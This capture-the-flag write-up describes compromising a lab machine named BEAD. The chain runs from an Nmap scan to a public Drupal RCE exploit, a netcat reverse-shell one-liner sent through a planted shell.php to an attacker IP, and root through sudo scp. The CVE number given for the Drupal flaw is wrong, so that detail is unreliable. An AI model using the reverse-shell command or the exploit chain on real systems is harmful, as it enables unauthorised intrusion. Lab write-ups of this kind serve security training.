This article describes the solution steps of the retired machine that named “BEAD” on the Priviahub platform. This writeup has been prepared by a PriviaHub user “CEngover”. Machine that has Ubuntu operating system and Medium-3 difficulty level is specially shared for Priviahub’s first year anniversary. The solution steps are giving in below.
First of all, the target system has been scanned by using Nmap tool.
nmap -sC -sV 172.16.5.111 -oA nmap/bead-open-ports
Script and version scan was performed for the target system with this command. The scan results that obtained are shown in Image 1.
As a result of the scanning process, it was determined that TCP ports 80 and 22 are open and OpenSSH service is running on port 22 and http service is running on port 80. Also as a result of the Nmap scan, it was listed web application accessible directories that works on HTTP service.
Target website has a login page when we are trying to visit on port 80. Drupal content management system runs on this system. If such a content management system is encountered for the first time, it is necessary to continue the information gathering process. Determining of the accessible sub directories, technologies that web application uses are might be help to get information about next step.
Technologies that website uses listed with this command. As a result of this process, version information of Drupal content management system was determined.
When the CHANGELOG.txt file which is detected as a result of the Nmap scan was visited, the latest version of Drupal was determined to be 7.57.
As a result of obtaining the version information, it was determined that the current version was affected by the CVE-2020-7600 code Remote Code Execution vulnerability and the exploit code of this vulnerability was determined by Google search. You can access the Exploit link here.
Image 5 contains the visual of the session that obtained from the target system as a result of running the exploit file.
ruby 44449.rb http://172.16.5.111
The vulnerability was triggered with this command and command line session was obtained on the target system. To get a more efficient shell connection from the system, an interactive reverse shell can be obtained from the shell.php page loaded to the system using this exploit.
http://172.16.5.111/sites/default/files/shell.php?c=mknod 0</tmp/backpipe p;/bin/sh /tmp/backpipe|nc 18.104.22.168 1337 1>/tmp/backpipe
A reverse shell connection with netcat was obtained by sending a connection request to the port number 1337 which was listened on the attack machine with this command.
Session obtained with user named rain who has low privileges on the target system. To list what user rain can do with sudo, sudo –l command has been executed. It has been determined with sudo that rain can run scp tool with root privileges without specifying any password.
It was implemented steps in Image 7 to obtain a shell with root user using the scp application. The process of privilege escalation by providing access to root rights has been completed.